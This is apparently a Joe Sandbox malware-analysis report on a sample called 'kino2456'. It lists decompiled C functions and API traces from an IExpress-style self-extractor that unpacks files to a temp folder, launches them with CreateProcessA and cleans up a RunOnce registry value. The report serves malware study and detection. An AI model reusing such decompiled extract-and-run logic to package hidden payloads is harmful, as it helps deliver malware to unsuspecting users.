0x00fc6bd3
0x00fc6bd6
0x00fc6bda
0x00fc6be1
0x00fc6be3
0x00fc6be5
0x00fc6be5
0x00fc6be6
0x00fc6be6
0x00fc6be9
0x00fc6bea
0x00fc6bea
0x00fc6b74
0x00fc6c39
0x00fc6c3e
0x00fc6c3e
0x00fc6abe
0x00fc6abe
0x00000000

APIs

Part of subcall function 00FC7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FC7182
Part of subcall function 00FC7155: GetCurrentProcessId.KERNEL32 ref: 00FC7191
Part of subcall function 00FC7155: GetCurrentThreadId.KERNEL32 ref: 00FC719A
Part of subcall function 00FC7155: GetTickCount.KERNEL32 ref: 00FC71A3
Part of subcall function 00FC7155: QueryPerformanceCounter.KERNEL32(?), ref: 00FC71B8

GetStartupInfoW.KERNEL32(?,00FC72B8,00000058), ref: 00FC6A7F
Sleep.KERNEL32(000003E8), ref: 00FC6AB4
_amsg_exit.MSVCRT ref: 00FC6AC9
_initterm.MSVCRT ref: 00FC6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00FC6B49
exit.KERNELBASE ref: 00FC6BBF
_ismbblead.MSVCRT ref: 00FC6BDA

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 36af735b5b6d2ca20a435a0c3646ef51a3926c6a91a6587024ba0aaa0aff0374
Instruction ID: 6b30ed25b0f7ebc899f015b19f78a7b85f442215e142973e0ea850590cf39a18
Opcode Fuzzy Hash: 36af735b5b6d2ca20a435a0c3646ef51a3926c6a91a6587024ba0aaa0aff0374
Instruction Fuzzy Hash: B0419071D4C32B9BDB219B649F07FAA77E4EB84761F14412EE841E3291CB748C42BA91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00FC58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00FC1680(_t20, _t36, _t33);
					E00FC658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xfc9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00FC44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xfc9124 = E00FC6285();
					_t14 = 0;
				}
				return _t14;
			}

0x00fc58cd
0x00fc58d1
0x00fc58d3
0x00fc58d5
0x00fc58d8
0x00fc58d8
0x00fc58da
0x00fc58db
0x00fc58e1
0x00fc58ed
0x00fc58f1
0x00fc591e
0x00fc592c
0x00fc5943
0x00fc594a
0x00fc594d
0x00fc5953
0x00fc5959
0x00000000
0x00fc595b
0x00fc595c
0x00fc5963
0x00fc596c
0x00000000
0x00fc5972
0x00fc5974
0x00fc597a
0x00fc597a
0x00fc596c
0x00fc58f3
0x00fc5901
0x00fc5906
0x00fc590b
0x00fc5910
0x00fc5910
0x00fc5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC5943
LocalFree.KERNEL32(00000000,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC594D
CloseHandle.KERNEL32(00000000,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00FC5963

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC58CD, 00FC58CF, 00FC5919, 00FC5962
TMP4351$.TMP, xrefs: 00FC5923

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
API String ID: 747627703-394614654
Opcode ID: 302b71f428dc5ed2767ff4ea7caabfdd29d4790ed7482feea93645fea00eb2c6
Instruction ID: 68b671984b3a9689dcda78c0315264064e54b9e9ba1f2199c5852cebd94c0c83
Opcode Fuzzy Hash: 302b71f428dc5ed2767ff4ea7caabfdd29d4790ed7482feea93645fea00eb2c6
Instruction Fuzzy Hash: 8F117872A0021A6BC7241F7A5E0FF9B7E9DEF8A774B10065DF506D31C1CA74EC09A6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00FC3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00FC6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xfc9124 = E00FC6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E00FC44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xfc8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xfc9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xfc9a2c = _t44;
						}
					}
				}
				E00FC411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xfc9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00fc3fef
0x00fc3ffa
0x00fc4001
0x00fc4008
0x00fc400a
0x00fc400b
0x00fc4010
0x00fc410a
0x00fc411a
0x00fc411a
0x00fc401c
0x00fc401d
0x00fc401e
0x00fc401f
0x00fc4033
0x00fc403b
0x00fc40ca
0x00fc40e9
0x00fc40f8
0x00fc4101
0x00fc4106
0x00fc4106
0x00fc4108
0x00fc4108
0x00000000
0x00fc4108
0x00fc4049
0x00fc405c
0x00fc4062
0x00fc4068
0x00fc406e
0x00fc4070
0x00fc4077
0x00fc407f
0x00fc4089
0x00fc408b
0x00fc408b
0x00fc4089
0x00fc4077
0x00fc4091
0x00fc409c
0x00fc40a8
0x00fc40b8
0x00000000
0x00fc40c2
0x00000000
0x00fc40c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00FC4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FC4049
GetExitCodeProcess.KERNELBASE ref: 00FC405C
CloseHandle.KERNEL32(?), ref: 00FC409C
CloseHandle.KERNEL32(?), ref: 00FC40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FC40DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00FC40E9

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 3226feb0ba1c369cea79b2dcb01d51e82113da6ac816be9cb3e0d71859ea81ad
Instruction ID: 4f58767b28ed5b20b2aa018021edcb83ef59fc0d8a891fe2b9aac3f1d1baa361
Opcode Fuzzy Hash: 3226feb0ba1c369cea79b2dcb01d51e82113da6ac816be9cb3e0d71859ea81ad
Instruction Fuzzy Hash: 6531D131A8020CABEB209B25DE4FFAB7778EB94714F1001ADF945D2161CA346C85EF11

Uniqueness

Uniqueness Score: -1.00%

Function 00FC51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00FC468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00FC468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00FC44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xfc9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xfc9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00FC44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xfc9124 = 0x80070714;
					goto L10;
				}
				E00FC44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xfc9124 = E00FC6285();
				goto L10;
			}

0x00fc51fb
0x00fc5207
0x00fc520b
0x00fc523c
0x00fc5268
0x00fc5270
0x00fc528b
0x00fc5293
0x00fc529c
0x00fc52a6
0x00fc52b0
0x00000000
0x00fc52b0
0x00fc529e
0x00fc5279
0x00000000
0x00fc527b
0x00fc5273
0x00000000
0x00fc5273
0x00fc524a
0x00fc5250
0x00fc5256
0x00000000
0x00fc5256
0x00fc5219
0x00fc5223
0x00000000

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FC2F4D,?,00000002,00000000), ref: 00FC5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FC5250

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

Strings

<None>, xrefs: 00FC5262
UPROMPT, xrefs: 00FC51EF, 00FC5230

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 8905f6c1bddf495a951fbc1ce38798df5ced5c1de22d4f87afa8de464bace3a8
Instruction ID: 8b225fd91d9c29a2ba6cf16e2a969e96fb03d263d12b0a3a06b56a496924ca84
Opcode Fuzzy Hash: 8905f6c1bddf495a951fbc1ce38798df5ced5c1de22d4f87afa8de464bace3a8
Instruction Fuzzy Hash: C711E6B264460B6BE3146B715F5BF7B71DDEB89794B10402DBA02D6191DABDAC007224

Uniqueness

Uniqueness Score: -1.00%

Function 00FC52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FC52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xfc91e0; // 0xa28ec8
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xfc8a24 == 0 &&  *0xfc9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0xfc8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0xfc8a24 == 0 &&  *0xfc9a30 == 0) {
					_push(_t22);
					E00FC1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
					if(( *0xfc9a34 & 0x00000020) != 0) {
						E00FC65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00FC2390( &_v268);
					_t11 =  *0xfc8a20; // 0x0
				}
				if( *0xfc9a40 != 1 && _t11 != 0) {
					_t11 = E00FC1FE1(_t22); // executed
				}
				 *0xfc8a20 =  *0xfc8a20 & 0x00000000;
				return E00FC6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x00fc52b6
0x00fc52b6
0x00fc52b6
0x00fc52c1
0x00fc52c8
0x00fc52cb
0x00fc52cc
0x00fc52d4
0x00fc52d6
0x00fc52d7
0x00fc52de
0x00fc52e0
0x00fc52f2
0x00fc52fa
0x00fc52fa
0x00fc5302
0x00fc5305
0x00fc530c
0x00fc5312
0x00fc5316
0x00fc5316
0x00fc5317
0x00fc531c
0x00fc531f
0x00fc5333
0x00fc5345
0x00fc5351
0x00fc5359
0x00fc5359
0x00fc5363
0x00fc5369
0x00fc536f
0x00fc5374
0x00fc5374
0x00fc5381
0x00fc5387
0x00fc5387
0x00fc538f
0x00fc53a0

APIs

SetFileAttributesA.KERNELBASE(00A28EC8,00000080,?,00000000), ref: 00FC52F2
DeleteFileA.KERNELBASE(00A28EC8), ref: 00FC52FA
LocalFree.KERNEL32(00A28EC8,?,00000000), ref: 00FC5305
LocalFree.KERNEL32(00A28EC8), ref: 00FC530C
SetCurrentDirectoryA.KERNELBASE(00FC11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00FC5363

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC5334

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 2833751637-1610346413
Opcode ID: 8e2ff582dcf2998177a611973060961c9c90ed7fd8aee4b956ded760c7d94b07
Instruction ID: 382b2fbade48dc0c40f31491da54af4c1cff79ac2e7c5036ba126c1b1291d759
Opcode Fuzzy Hash: 8e2ff582dcf2998177a611973060961c9c90ed7fd8aee4b956ded760c7d94b07
Instruction Fuzzy Hash: FC218E3190464EDFDB209B20DF0BFA977A5BB50BE4F04015DE446971A0CBB9AC89FB41

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xfc8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00fc1fee
0x00fc2005
0x00fc200d
0x00fc2017
0x00000000
0x00fc2020
0x00fc200d
0x00fc2029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00FC538C,?,?,00FC538C), ref: 00FC2005
RegDeleteValueA.KERNELBASE(00FC538C,wextract_cleanup2,?,?,00FC538C), ref: 00FC2017
RegCloseKey.ADVAPI32(00FC538C,?,?,00FC538C), ref: 00FC2020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FC1FFB
wextract_cleanup2, xrefs: 00FC1FE7, 00FC200F

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
API String ID: 849931509-3354236729
Opcode ID: fbd07696e0cc656077c0e6bdfd9d21cf2553a41ffc041083e4b99e5167e65d71
Instruction ID: 50903ce96a35e15161117bd1a4b31cd0fb0e8ce08a6582c87327c8009bb7b2ee
Opcode Fuzzy Hash: fbd07696e0cc656077c0e6bdfd9d21cf2553a41ffc041083e4b99e5167e65d71
Instruction Fuzzy Hash: 9DE04F3099031DBBD7218B90EF0BF597B29F7407D4F140199B904A2061EBA1AA14F606

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FC4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xfc8004; // 0xd6d6fca6
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xfc91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00FC4E99(_t75);
						L35:
						return E00FC6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xfc8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xfc91e4;
						_t58 = 0xfc91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xfc91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xfc91e4;
						_t30 = E00FC4702( &_v268, 0xfc91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00FC476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00FC4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00FC47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xfc93f4 =  *0xfc93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xfc91e4;
						_t63 = 0xfc91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xfc91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xfc91e4;
						_t30 = E00FC4702( &_v268, 0xfc91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00FC4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00FC4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00FC4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00fc4cd0
0x00fc4cdb
0x00fc4ce0
0x00fc4ce2
0x00fc4cee
0x00fc4cf2
0x00fc4d0e
0x00fc4d0e
0x00fc4d11
0x00fc4e83
0x00fc4e88
0x00fc4e98
0x00fc4e98
0x00fc4d17
0x00fc4d17
0x00fc4d1a
0x00fc4d2f
0x00fc4d2f
0x00000000
0x00fc4d2f
0x00fc4d1c
0x00fc4d1c
0x00fc4d1f
0x00fc4dcb
0x00fc4dd0
0x00fc4dd2
0x00fc4ddd
0x00fc4ddd
0x00fc4de3
0x00fc4de8
0x00fc4ded
0x00fc4ded
0x00fc4def
0x00fc4df0
0x00fc4df0
0x00fc4df4
0x00fc4df4
0x00fc4df6
0x00fc4df9
0x00fc4dfc
0x00fc4dfc
0x00fc4dfe
0x00fc4dff
0x00fc4dff
0x00fc4e03
0x00fc4e08
0x00fc4e0a
0x00fc4e0f
0x00fc4d03
0x00fc4d03
0x00000000
0x00fc4d03
0x00fc4e18
0x00fc4e20
0x00fc4e25
0x00fc4e27
0x00000000
0x00000000
0x00fc4e33
0x00fc4e38
0x00fc4e3a
0x00000000
0x00000000
0x00fc4e40
0x00fc4e51
0x00fc4e56
0x00fc4e5b
0x00fc4e5e
0x00000000
0x00000000
0x00fc4e6a
0x00fc4e6f
0x00fc4e71
0x00000000
0x00000000
0x00fc4e77
0x00fc4e7d
0x00000000
0x00fc4e7d
0x00fc4d25
0x00fc4d25
0x00fc4d28
0x00fc4d36
0x00fc4d3b
0x00fc4d40
0x00fc4d40
0x00fc4d42
0x00fc4d43
0x00fc4d43
0x00fc4d47
0x00fc4d4a
0x00fc4d4a
0x00fc4d4c
0x00fc4d4f
0x00fc4d4f
0x00fc4d51
0x00fc4d52
0x00fc4d52
0x00fc4d56
0x00fc4d5b
0x00fc4d5d
0x00fc4d62
0x00000000
0x00000000
0x00fc4d67
0x00fc4d6f
0x00fc4d74
0x00fc4d76
0x00000000
0x00000000
0x00fc4d7c
0x00fc4d84
0x00fc4d89
0x00fc4d8b
0x00000000
0x00000000
0x00fc4d94
0x00fc4d99
0x00fc4d9e
0x00fc4da1
0x00fc4daa
